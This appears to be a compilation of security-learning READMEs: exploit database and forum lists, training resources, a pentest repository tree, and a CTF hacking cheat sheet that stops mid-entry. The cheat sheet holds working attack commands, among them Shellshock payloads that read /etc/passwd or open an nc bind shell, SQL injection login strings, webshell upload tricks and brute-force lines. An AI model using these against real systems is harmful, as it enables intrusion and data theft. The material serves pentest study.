Easy to navigate database of exploits [Exploit Database](https://www.exploit-db.com/) | database of a wide variety exploits, CVE compliant archive [CXsecurity](https://cxsecurity.com/exploit/) | Indie cybersecurity info managed by 1 person [Snyk Vulnerability DB](https://snyk.io/vuln/) | detailed info and remediation guidance for known vulns, also allows you to test your code ### Forums Name | Description ---- | ---- [0x00sec](https://0x00sec.org/) | hacker, malware, computer engineering, Reverse engineering [Antichat](https://forum.antichat.ru/) | russian based forum [CODEBY.NET](https://codeby.net/) | hacker, WAPT, malware, computer engineering, Reverse engineering, forensics - russian based forum [EAST Exploit database](http://eastexploits.com/) | exploit DB for commercial exploits written for EAST Pentest Framework [Greysec](https://greysec.net) | hacking and security forum [Hackforums](https://hackforums.net/) | posting webstite for hacks/exploits/various discussion [4Hat Day](http://4hatday.com) | brazilian based hacker forum [CaveiraTech](https://caveiratech.com/forum) | brazilian based, general hacker forum ### Archived Security Conference Videos Name | Description ---- | ---- [InfoCon.org](https://infocon.org/cons/) | hosts data from hundreds of cons [Irongeek](http://www.irongeek.com/) | Website of Adrien Crenshaw, hosts a ton of info. [infocondb.org](https://infocondb.org/) | a site that aims to catalog and cross-reference all hacker conferences. ### Online Communities Name | Description ---- | ----- [Hacktoday](https://www.hacktoday.net/) | requires an account, covering all kinds of hacking topics [Hack+](http://t.me/hacking_group_channel) | link requires telegram to be used [MPGH](http://mpgh.net) | community of MultiPlayerGameHacking ### Online News Sources Name | Description ---- | ---- [InfoSec](http://www.infosecurity-magazine.com/) | covers all the latest infosec topics [Recent Hash Leaks](https://hashes.org/public.php) | great place to lookup hashes [Security Intell](https://securityintelligence.com/news/) | covers all kinds of news, great intelligence resources [Threatpost](https://threatpost.com/) | covers all the latest threats and breaches [Secjuice](secjuice.com) [The Hacker News](https://thehackernews.com/) | features a daily stream of hack news, also has an app
# Cyber Resources -> by Freddie This is a collection of all the best resources I've learnt from and used in the past year of my cyber security learning. This is in no means a complete list, and will be updated consistently when I come across new content, or simply remember platforms I used to use. I'll try and sort this collection of resources into a few key sections: - Linux - Windows - Cryptography - Web - Binary - General Hacking - Miscellaneous ## Linux **https://linuxjourney.com/** - So much incredible content on Linux, gets into the nitty gritty about processes etc. **https://tryhackme.com/module/linux-fundamentals** - Good for getting to grips with the command line I think a great way of getting to grips with Linux is by trying to exploit it. Learning Linux privilege escalation is a good way to practice and deepen your understanding. Boot2Root machines are great for this, but I'd recommend start with **https://tryhackme.com/room/linuxprivesc** (TryHackMe again) to learn some of the more common PrivEsc methods before throwing yourself at a machine. ## Windows **https://youtu.be/Sdz1IOQghgo** - John Strand's introduction to Windows command line. Resources needed! - Create a pull request with anything! ### Powershell **https://posh-hunter.com/** - CTF-like introduction to Powershell. **https://underthewire.tech/** - OverTheWire, but for Powershell. ## Cryptography **https://cryptohack.org/** - The *best* platform I've come across for cryptography so far. **https://www.crypto101.io/** - A great book, if you pair this with the platform above, it will give you a great overall understanding. **https://www.cipherchallenge.org/resources-media/** - This one comes from the Cipher Challenge, run by the University of Southampton, it has multiple slides introducing some basic concepts, and a 60-page long handbook. **https://cryptopals.com** - I can't explain it better than they can, definitely worth checking the site out. **"An Introduction to Mathematical Cryptography 2014"** - Note: this is ***not*** free, and quite the opposite. However, I was lucky enough to get an old copy off a friend, and there's no way I can leave this one out. The content is great, so if you want to pursue cryptography further, this book is a good place to start. ## Binary **https://guyinatuxedo.github.io/** - A course on Binary Exploitation based around CTF challenges. **https://ir0nstone.gitbook.io/** - Notes from a student, definitely worth checking out! **https://ropemporium.com/** - A collection of challenges on return-oriented programming. ## Web **https://portswigger.net/web-security/all-materials** - How could I make a resource list and leave portswigger out, the web academy is simply the best I've seen for people wanting to learn more on Web Exploitation. **https://www.youtube.com/watch?v=4Jk_I-cw4WE&list=PLI_rLWXMqpSl_TqX9bbisW-d7tDqcVvOJ** - PwnFunction has a great collection of very clear videos explaining some web exploitation techniques, if you find videos easier to digest. **https://www.youtube.com/playlist?list=PLuyTk2_mYISLaZC4fVqDuW_hOk0dd5rlf** - Rana Khalil is amazing at explaining in depth SQL injection, and she's regularly producing more content, so watch this space! ## General Hacking **https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course** - A great course which covers many topics, and is incredibly cheap for the content you're getting. Note that Heath regularly does discounts on his twitter, so it's definitely worth watching out for that. **https://my.ine.com/CyberSecurity/learning-paths/a223968e-3a74-45ed-884d-2d16760b8bbd/penetration-testing-student** - INE has made their course for the eJPT certification completely free to take. It has some great content, and is very beginner focused. I believe labs are included for free, but it's worth noting the certification isn't. **https://www.hackthebox.eu/** - Some very challenging boot2root machines and challenges, and they're also branching out with their academy, which has regular updates to content: https://academy.hackthebox.eu (the majority of content on the academy is not free, however) **https://tryhackme.com/** - A great place to start with Cyber Security, they have loads of walkthrough and challenges around multiple areas in cyber security. Completely free for a large proportion of the content, although there is a subscriber feature. **https://www.rangeforce.com/** - Lots of free content, covers much more than just pentesting content. **https://overthewire.org/wargames/** - A large selection of challenges focusing on different areas, such as Linux, Web etc. **https://www.sans.org/** - SANS is great. They have such a wide variety of free content, from cheatsheets to free conferences. **https://www.cyberaces.org/** - Also developed by SANS, it's an online course of the basics, for free, of course ;) **https://enotes.nickapic.com/** - Another massive collection of notes, all created with love, by Nickapic. ## Miscellaneous ### People: https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw - John Hammond makes great informative and entertaining content on YouTube. https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA - IppSec has countless retired HackTheBox machines, and more on his channel. He's great to watch, even if you don't follow along, as you can just feel the intelligence leaking in. https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ - VbScrub has some brilliant videos on Active Directory, and focuses on Windows content, primarily through the HackTheBox platform. https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w - Live Overflow, has over 300 videos which range from technical to vlog-like. ### Resources: A collection of collections of much better resources than I have here. https://dfirmadness.com/getting-into-infosec/the-five-pillars/ https://noxcyber.co.uk/the-cheatsheet
# Project tree . * [Everything-OSCP](./Everything-OSCP) * [Checklists](./Everything-OSCP/Checklists) * [Linux Post exploitation](./Everything-OSCP/Linux Post exploitation) * [Windows buffer overflow](./Everything-OSCP/Windows buffer overflow) * [Windows Post exploitation](./Everything-OSCP/Windows Post exploitation) * [pentestbook](./pentestbook) * [assets](./pentestbook/assets) * [physical_access_to_machine](./pentestbook/physical_access_to_machine) * [styles](./pentestbook/styles) * [writeups](./pentestbook/writeups) * [AwesomeXSS](./AwesomeXSS) * [Database](./AwesomeXSS/Database) * [resource-threat-hunting](./resource-threat-hunting) * [Offensive-Security-OSCP-Cheatsheets](./Offensive-Security-OSCP-Cheatsheets) * [ctfs-walkthroughs](./Offensive-Security-OSCP-Cheatsheets/ctfs-walkthroughs) * [lab](./Offensive-Security-OSCP-Cheatsheets/lab) * [memory-forensics](./Offensive-Security-OSCP-Cheatsheets/memory-forensics) * [offensive-security](./Offensive-Security-OSCP-Cheatsheets/offensive-security) * [offensive-security-experiments](./Offensive-Security-OSCP-Cheatsheets/offensive-security-experiments) * [SCADA PLC ICS Pentest PDFs](./SCADA PLC ICS Pentest PDFs) * [awesome-industrial-control-system-security](./SCADA PLC ICS Pentest PDFs/awesome-industrial-control-system-security) * [Web-CTF-Cheatsheet](./Web-CTF-Cheatsheet) * [scripts](./Web-CTF-Cheatsheet/scripts) * [PayloadsAllTheThings](./PayloadsAllTheThings) * [AWS Amazon Bucket S3](./PayloadsAllTheThings/AWS Amazon Bucket S3) * [Command Injection](./PayloadsAllTheThings/Command Injection) * [CRLF Injection](./PayloadsAllTheThings/CRLF Injection) * [CSRF Injection](./PayloadsAllTheThings/CSRF Injection) * [CSV Injection](./PayloadsAllTheThings/CSV Injection) * [CVE Exploits](./PayloadsAllTheThings/CVE Exploits) * [Directory Traversal](./PayloadsAllTheThings/Directory Traversal) * [SAML Injection](./PayloadsAllTheThings/SAML Injection) * [File Inclusion](./PayloadsAllTheThings/File Inclusion) * [GraphQL Injection](./PayloadsAllTheThings/GraphQL Injection) * [Insecure Deserialization](./PayloadsAllTheThings/Insecure Deserialization) * [Insecure Direct Object References](./PayloadsAllTheThings/Insecure Direct Object References) * [Insecure Management Interface](./PayloadsAllTheThings/Insecure Management Interface) * [Insecure Source Code Management](./PayloadsAllTheThings/Insecure Source Code Management) * [JSON Web Token](./PayloadsAllTheThings/JSON Web Token) * [LaTeX Injection](./PayloadsAllTheThings/LaTeX Injection) * [LDAP Injection](./PayloadsAllTheThings/LDAP Injection) * [Methodology and Resources](./PayloadsAllTheThings/Methodology and Resources) * [NoSQL Injection](./PayloadsAllTheThings/NoSQL Injection) * [OAuth](./PayloadsAllTheThings/OAuth) * [Open Redirect](./PayloadsAllTheThings/Open Redirect) * [Server Side Request Forgery](./PayloadsAllTheThings/Server Side Request Forgery) * [Server Side Template Injection](./PayloadsAllTheThings/Server Side Template Injection) * [SQL Injection](./PayloadsAllTheThings/SQL Injection) * [_template_vuln](./PayloadsAllTheThings/_template_vuln) * [Type Juggling](./PayloadsAllTheThings/Type Juggling) * [Upload Insecure Files](./PayloadsAllTheThings/Upload Insecure Files) * [Web Cache Deception](./PayloadsAllTheThings/Web Cache Deception) * [Web Sockets](./PayloadsAllTheThings/Web Sockets) * [XPATH Injection](./PayloadsAllTheThings/XPATH Injection) * [XSS Injection](./PayloadsAllTheThings/XSS Injection) * [XXE Injection](./PayloadsAllTheThings/XXE Injection) * [Bypassing-Web-Application-Firewalls](./Bypassing-Web-Application-Firewalls) * [Hydra-Cheatsheet](./Hydra-Cheatsheet) * [Powershell-Cheatsheet](./Powershell-Cheatsheet) * [Windows-Privilege-Escalation](./Windows-Privilege-Escalation) * [Active-Directory-Fun](./Active-Directory-Fun) * [oscp](./oscp) * [recon_enum](./oscp/recon_enum) * [reports](./oscp/reports) * [templates](./oscp/templates) * [xapax.github.io](./xapax.github.io) * [css](./xapax.github.io/css) * [img](./xapax.github.io/img) * [js](./xapax.github.io/js) * [reveng](./xapax.github.io/reveng) * [pronotes](./pronotes) * [Awesome-Hacking-Resources](./Awesome-Hacking-Resources) * [Books](./Books) * [Notes VA](./Notes VA) * [lpeworkshop](./Notes VA/lpeworkshop) * [OSCPRepo](./OSCPRepo) * [CheetSheets](./OSCPRepo/CheetSheets) * [Local Info Enum](./OSCPRepo/Local Info Enum) * [PDFs&Documents](./OSCPRepo/PDFs&Documents) * [Priv Esc Checks](./OSCPRepo/Priv Esc Checks) * [Process&Methodology](./OSCPRepo/Process&Methodology) * [Reporting](./OSCPRepo/Reporting) * [Scanning&Recon](./OSCPRepo/Scanning&Recon) * [Tools](./OSCPRepo/Tools) * [KeepNotes](./OSCPRepo/KeepNotes) * [lists](./OSCPRepo/lists) * [scripts](./OSCPRepo/scripts) * [OSCP-Materials-master](./OSCP-Materials-master) * [Cheat Sheets](./OSCP-Materials-master/Cheat Sheets) * [Linux Privilege Escalation and Post Exploitation](./OSCP-Materials-master/Linux Privilege Escalation and Post Exploitation) * [Metasploit-Meterpreter-Msfvenom](./OSCP-Materials-master/Metasploit-Meterpreter-Msfvenom) * [PASSWORD CRACKING and Usefull TOOLS and Commands](./OSCP-Materials-master/PASSWORD CRACKING and Usefull TOOLS and Commands) * [SHELLCODE and Buffer Over Flow](./OSCP-Materials-master/SHELLCODE and Buffer Over Flow) * [Understand Privilege Escalation](./OSCP-Materials-master/Understand Privilege Escalation) * [Window Privilege Escalation and Post Exploitation](./OSCP-Materials-master/Window Privilege Escalation and Post Exploitation) * [ctf](./ctf) * [natas](./ctf/natas) * [metasploit scripts](./metasploit scripts) * [penbook](./penbook) * [assets](./penbook/assets) * [physical_access_to_machine](./penbook/physical_access_to_machine) * [styles](./penbook/styles) * [writeups](./penbook/writeups) * [python-pty-shells-master](./python-pty-shells-master) * [liodeus.github.io](./liodeus.github.io) * [assets](./liodeus.github.io/assets) * [_includes](./liodeus.github.io/_includes) * [_layouts](./liodeus.github.io/_layouts) * [_posts](./liodeus.github.io/_posts) * [tbhm](./tbhm) * [v4](./tbhm/v4) * [Pentest-Everything](./Pentest-Everything) * [everything](./Pentest-Everything/everything) * [resources](./Pentest-Everything/resources) * [to-do-wip](./Pentest-Everything/to-do-wip) * [wip-osint](./Pentest-Everything/wip-osint) * [writeups](./Pentest-Everything/writeups) * [OSEP-Code-Snippets](./OSEP-Code-Snippets) * [AppLocker Bypass PowerShell Runspace](./OSEP-Code-Snippets/AppLocker Bypass PowerShell Runspace) * [Fileless Lateral Movement](./OSEP-Code-Snippets/Fileless Lateral Movement) * [Linux Shellcode Encoder](./OSEP-Code-Snippets/Linux Shellcode Encoder) * [Linux Shellcode Loaders](./OSEP-Code-Snippets/Linux Shellcode Loaders) * [MiniDump](./OSEP-Code-Snippets/MiniDump) * [MSSQL](./OSEP-Code-Snippets/MSSQL) * [PrintSpoofer.NET](./OSEP-Code-Snippets/PrintSpoofer.NET) * [ROT Shellcode Encoder](./OSEP-Code-Snippets/ROT Shellcode Encoder) * [Sections Shellcode Process Injector](./OSEP-Code-Snippets/Sections Shellcode Process Injector) * [Shellcode Process Hollowing](./OSEP-Code-Snippets/Shellcode Process Hollowing) * [Shellcode Process Injector](./OSEP-Code-Snippets/Shellcode Process Injector) * [Simple Shellcode Runner](./OSEP-Code-Snippets/Simple Shellcode Runner) * [XOR Shellcode Encoder](./OSEP-Code-Snippets/XOR Shellcode Encoder) * [Active-Directory-Exploitation-Cheat-Sheet](./Active-Directory-Exploitation-Cheat-Sheet) * [oscp-pre-preparation-plan-and-notes](./oscp-pre-preparation-plan-and-notes) * [OSEP](./OSEP) * [Bypass_Defender](./OSEP/Bypass_Defender) * [Lateral_Movement](./OSEP/Lateral_Movement) * [MSSQL](./OSEP/MSSQL) * [Payloads](./OSEP/Payloads) * [pentest_notebook](./pentest_notebook) * [Active Directory](./pentest_notebook/Active Directory) * [Blue Team](./pentest_notebook/Blue Team) * [Cheatsheets](./pentest_notebook/Cheatsheets) * [Code snippets](./pentest_notebook/Code snippets) * [Consultation](./pentest_notebook/Consultation) * [DFIR](./pentest_notebook/DFIR) * [Metasploit](./pentest_notebook/Metasploit) * [Mind Maps](./pentest_notebook/Mind Maps) * [Mobile Pentest](./pentest_notebook/Mobile Pentest) * [Networking](./pentest_notebook/Networking) * [Network Pentest](./pentest_notebook/Network Pentest) * [Privilege Escalation](./pentest_notebook/Privilege Escalation) * [SCREENSHOTS](./pentest_notebook/SCREENSHOTS) * [Scripts](./pentest_notebook/Scripts) * [Testing Checklists](./pentest_notebook/Testing Checklists) * [VA SCAN CONFIG](./pentest_notebook/VA SCAN CONFIG) * [Web Pentest](./pentest_notebook/Web Pentest) * [WIFI Pentest](./pentest_notebook/WIFI Pentest) * [Awesome-Advanced-Windows-Exploitation-References](./Awesome-Advanced-Windows-Exploitation-References) * [Buffer_Overflow](./Buffer_Overflow) * [Screenshots](./Buffer_Overflow/Screenshots) * [Cheatsheet-God](./Cheatsheet-God) * [Checklists](./Checklists) * [Linux-Privilege-Escalation](./Linux-Privilege-Escalation) * [MSF-Venom-Cheatsheet](./MSF-Venom-Cheatsheet) * [OSCP-Exam-Report-Template](./OSCP-Exam-Report-Template) * [Red-Team-Infrastructure-Wiki](./Red-Team-Infrastructure-Wiki) * [images](./Red-Team-Infrastructure-Wiki/images) * [security-cheatsheets](./security-cheatsheets) * [Open-Source-Security-List-](./Open-Source-Security-List-) * [awesome-mitre-attack](./awesome-mitre-attack) * [escalationserver](./escalationserver) * [AutoLocalPrivilegeEscalation](./escalationserver/AutoLocalPrivilegeEscalation) * [BeRoot](./escalationserver/BeRoot) * [JAWS](./escalationserver/JAWS) * [kernelpop](./escalationserver/kernelpop) * [linux-smart-enumeration](./escalationserver/linux-smart-enumeration) * [mimikatz](./escalationserver/mimikatz) * [Powerless](./escalationserver/Powerless) * [PowerLessShell](./escalationserver/PowerLessShell) * [PowerSploit](./escalationserver/PowerSploit) * [Privesc](./escalationserver/Privesc) * [PrivEsc](./escalationserver/PrivEsc) * [pypykatz](./escalationserver/pypykatz) * [PENTESTING-BIBLE](./PENTESTING-BIBLE) * [1-part-100-article](./PENTESTING-BIBLE/1-part-100-article) * [10-part-100-article](./PENTESTING-BIBLE/10-part-100-article) * [11-part-24-article](./PENTESTING-BIBLE/11-part-24-article) * [2-part-100-article](./PENTESTING-BIBLE/2-part-100-article) * [2](./PENTESTING-BIBLE/2) * [3-part-100-article](./PENTESTING-BIBLE/3-part-100-article) * [4-part-100-article](./PENTESTING-BIBLE/4-part-100-article) * [5-part-100-article](./PENTESTING-BIBLE/5-part-100-article) * [6-part-100-article](./PENTESTING-BIBLE/6-part-100-article) * [7-part-100-article](./PENTESTING-BIBLE/7-part-100-article) * [8-part-100-article](./PENTESTING-BIBLE/8-part-100-article) * [9-part-100-article](./PENTESTING-BIBLE/9-part-100-article) * [latest_articles](./PENTESTING-BIBLE/latest_articles) * [new](./PENTESTING-BIBLE/new) * [pentest-book](./pentest-book) * [exploitation](./pentest-book/exploitation) * [enumeration](./pentest-book/enumeration) * [img](./pentest-book/img) * [mobile](./pentest-book/mobile) * [others](./pentest-book/others) * [post-exploitation](./pentest-book/post-exploitation) * [recon](./pentest-book/recon) * [sections](./pentest-book/sections) * [pentest_compilation](./pentest_compilation) * [Phishing](./pentest_compilation/Phishing) * [PostExplotation](./pentest_compilation/PostExplotation) * [Recon](./pentest_compilation/Recon) * [Shells](./pentest_compilation/Shells) * [WebVulnerabilities](./pentest_compilation/WebVulnerabilities)
## Bugbounty Resources ### cheat sheets - [account takeover checklist](https://github.com/aufzayed/bugbounty/blob/main/account_takeover_checklist.md) - [remote code execution checklist](https://github.com/aufzayed/bugbounty/blob/main/remote_code_execution_checklist.md) - [web applications fingerprinting tools](https://github.com/aufzayed/bugbounty/blob/main/web_applications_fingerprinting_tools.md) ### tricks - [403 bypass methods](https://github.com/aufzayed/bugbounty/blob/main/403-bypass/README.md) ### Vulnerabilities - [Insecure Deserialization](https://github.com/aufzayed/bugbounty/blob/main/Insecure%20Deserialization.pdf)
# Hacking-and-CTF-Cheat-Sheet This is my collection of Commands and Syntax for all utils i use when trying to hack CTF's challanges, maybe it can help others... Enjoy @hasamba # Hacking Cheat Sheet # Reconnaissance (Information Gathering) - [hunter.io](https://hunter.io/) - known email and users for a specific domain - theharvester - search for emails in several search engines ```bash theHarvester -d *.co.il -l 500 -b google ``` - sublist3r - search for subdomain for a given domain - [crt.sh](http://crt.sh) - subdomains search with %.tesla.co.il - [httprobe](https://github.com/tomnomnom/httprobe) - will check a list of domain if they are alive, we can fire it sublis3r results - [amass](https://github.com/OWASP/Amass) - can also search for subdomains and more ```bash amass enum -d tesla.com ``` - [builtwith](https://builtwith.com/) - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies - [wappalizer](https://www.wappalyzer.com/download/) - browser addon that does almost the same as builtwith - whatweb - same but uglier than builtwith - [sumrecon](https://github.com/Gr1mmie/sumrecon) - script that automate some of the above - [shodan.io](http://shodan.io) - find open ports and services online - [dnsdumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records - [ipinfo.io](http://ipinfo.io) - ip info - [dehashed](https://www.dehashed.com) - find leaked emails and passwords - simplyemail - enumerate all the online places (github, target site etc) ``` git clone https://github.com/killswitch-GUI/SimplyEmail.git ./SimplyEmail.py -all -e TARGET-DOMAIN ``` - DNSRecon - DNS Bruteforce ```bash dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml ``` - Skipfish - prepares an interactive sitemap for the targeted site ```bash # basic scan skipfish -o out_dir https://www.host.com # using cookies to access authenticated pages skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com ``` - [namechk](https://namechk.com/) / [whatsmyname](https://whatsmyname.app/) / [namecheckup](https://namecheckup.com/) - OSINT use accounts around the web - [maltego](https://sectools.org/tool/maltego/) - data mining application - Exploiting Shellshock ```bash git clone https://github.com/nccgroup/shocker ``` ```bash ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose ``` cat file (view file contents) ```bash echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 ``` Shell Shock run bind shell ```bash echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 ``` Shell Shock reverse Shell ```bash nc -l -p 443 ``` # Scanning - arp-scan (Kali) - gives all IP's on NAT - netdiscover (Kali) - show live IP's ```bash sudo netdiscover -r 10.0.0.0/24 ``` - [rustscan](https://github.com/RustScan/RustScan#-usage) - Scans all 65k ports in 3 seconds and pipe them to NMAP ```bash rustscan -a 127.0.0.1 -- -A -sC #it's like running nmap -Pn -vvv -p $PORTS -A -sC 127.0.0.1 ``` - nmap ```bash nmap -T4 -p- -A 192.168.249.128 nmap -sV -sC -O FILENAME IP nmap -sU -sV --script=vuln #search vulnarabilities #T4: speed 1-5, prefered 4, #-p-: scan all 65K ports, #-A: all information possible, #-sS: stealth mode is running by default, it means that we do not establish a connection, instead after ACK we send a reset (SYN→SYNACK→RST) #-sV: find versions #-sc: default script #-O: output to file ls /usr/share/nmap/scripts/* | grep ftp #Search nmap scripts for keywords #clean results grep '/tcp' FILENAME | awk -F "/" '{print $1}'| tr '\n' ',';echo ``` - masscan (kali): another fast port scanner ```bash masscan -p1-65535 --rate 1000 10.0.0.101 ``` - metasloit - auxiliary in msf is extra enumration and recon ```bash use auxiliary/scanner/smb/smb_version ``` - searchsploit (kali) - search exploit-db website offline ```bash searchsploit mod ssl 2 ``` - [Nessus](https://www.tenable.com/products/nessus) - vulnerability assessment, it can scan for open ports, open vulnerabilities, directory busting - openvas - Vulnerability Assessment ```bash apt-get update apt-get dist-upgrade -y apt-get install openvas openvas-setup netstat -tulpn #Verify openvas is running using #Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup ``` ## AIO Scanners - [nmap automator](https://github.com/21y4d/nmapAutomator) - A script that you can run in the background! ```bash ./nmapAutomator.sh <TARGET-IP> <TYPE> ./nmapAutomator.sh 10.1.1.1 All ./nmapAutomator.sh 10.1.1.1 Basic ./nmapAutomator.sh 10.1.1.1 Recon ``` - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services ```bash autorecon 127.0.0.1 ``` - [Vanquish](https://github.com/frizb/Vanquish) - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount) ```bash echo "[IP]" > ~/tools/vanquish/hosts.txt python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME] ``` - [hackerEnv](https://github.com/abdulr7mann/hackerEnv) - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them ```bash ./hackerEnv -t 10.10.10.10 ``` - [fsociety](https://github.com/Manisso/fsociety) - A Penetration Testing Framework, you will have every script that a hacker needs - recon-ag - full-featured web reconnaissance framework written in Python ```bash git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng ./recon-ng show modules help ``` - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services ```bash autorecon 127.0.0.1 ``` - [legion](https://github.com/carlospolop/legion) - Automatic Enumeration Tool ```jsx sudo ~/tools/legion/legion.py options set host 10.0.0.210 run ``` # Enumeration Open Ports [Pentesting Network](https://book.hacktricks.xyz/pentesting/pentesting-network) ## FTP Enumeration (21) ```bash nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1 FTP anonymous sign in mget * #download everything #can we upload file as anonymous? #if so we can try upload a cmd webshell and execute commands locate cmd.aspx #if iis put cmd.aspx #browse to the file: http://IP/cmd.aspx #we can also try to create a shell payload with msfvenum and upload it ``` ## **SSH (22):** ```bash ssh INSERTIPADDRESS 22 nc IP 22 nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s #downloading scp username@hostname:/path/to/remote/file /path/to/local/file ``` If NMAP show "SSH Filtered" it means that [port knocking](https://blog.rapid7.com/2017/10/04/how-to-secure-ssh-server-using-port-knocking-on-ubuntu-linux/) is enable ```bash #we need to find the /etc/knockd.conf (thorough LFI or FTP or something else) #inside there is a sequence knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 #check nmap again ``` ## **SMTP Enumeration (25):** ```bash nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 ``` ```bash nc -nvv INSERTIPADDRESS 25 ``` ```bash telnet INSERTIPADDRESS 25 ``` ```jsx use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 msf auxiliary(smtp_enum) > set rport 25 msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt msf auxiliary(smtp_enum) > exploitw ``` ## DNS (53) ```bash #DNS zone transfer sudo nano /etc/hosts 10.10.10.123 friendzone.red host -l friendzone.red 10.10.10.123 ``` ## **Finger Enumeration (79):** Download script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) ```bash finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)( ``` ## **Web Enumeration (80/443):** [extra enumeration from hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) if we get default apache page, try entering IP to HOSTS Before dirbusting, try going to index.php or index.html to know which extention to look for ```bash dirbuster (GUI) #1st try without "be recursive" ``` ```powershell cd ~/tools ./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100 ``` ```bash Web Extensions sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar ``` ```bash dirb http://target.com /path/to/wordlist dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old ``` ```bash gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php use -r (recursive) or try found folders ``` ```bash nikto –h 10.0.0.1 #web vulnerability scanner ``` ```jsx owasp zap ``` ```bash Look for Default Credentials ``` ```bash sql ``` - View Page Source ```bash Hidden Values Developer Remarks Extraneous Code Passwords! ``` - burpsuite ```bash compare “host:” crsf token = no bruteforce add php code if url has anything.php <L> anything being executed? try directory traversal ../../../home ``` - sign in page ```bash SQL Injection ‘or 1=1– – ‘ or ‘1’=1 ‘ or ‘1’=1 — – ‘– Use known Username tyler’ — – tyler’) — – #bruteforce hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message> ``` - file upload ```bash #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND #we want to check if we can upload files davtest -url http://IP #if we see succedd we can use curl to upload: curl -X PUT http://10.10.10.15/df.txt -d @test.txt #and execute it: **curl http://10.10.10.15/df.txt** Blacklisting bypass bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 Whitelisting bypass passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php) ``` - Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist ```bash wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ ``` - [Knockpy](https://github.com/guelfoweb/knock) - enumerate subdomains on a target domain through a wordlist ```bash knockpy domain.com ``` - wpscan - if wordpress found ```bash wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access ``` - joomscan - if joomla found ```powershell cd ~/tools/joomscan perl joomscan.pl -u http://10.10.10.150/administrator/ ``` ## If A File is found - steghide - check pictures for hidden files ```bash apt-get install steghide steghide extract -sf picture.jpg steghide info picture.jpg apt-get install stegosuite ``` - [Stegseek](https://github.com/RickdeJager/stegseek) - lightning fast steghide cracker to extract hidden data from files ```bash stegseek [stegofile.jpg] [wordlist.txt] ``` - binwalk - extract hidden files from files (steganography) ```bash binwalk FILE.JPG #if something was found binwalk -e FILE ``` - strings - check strings in files ```bash stringe FILE.jpg ``` - [exiftool](https://github.com/exiftool/exiftool) - pictures metadata - zip2john - prepare an encrpyted zip file for john hacking ```bash zip2john ZIPFILE > zip.hashs ``` - SQLite 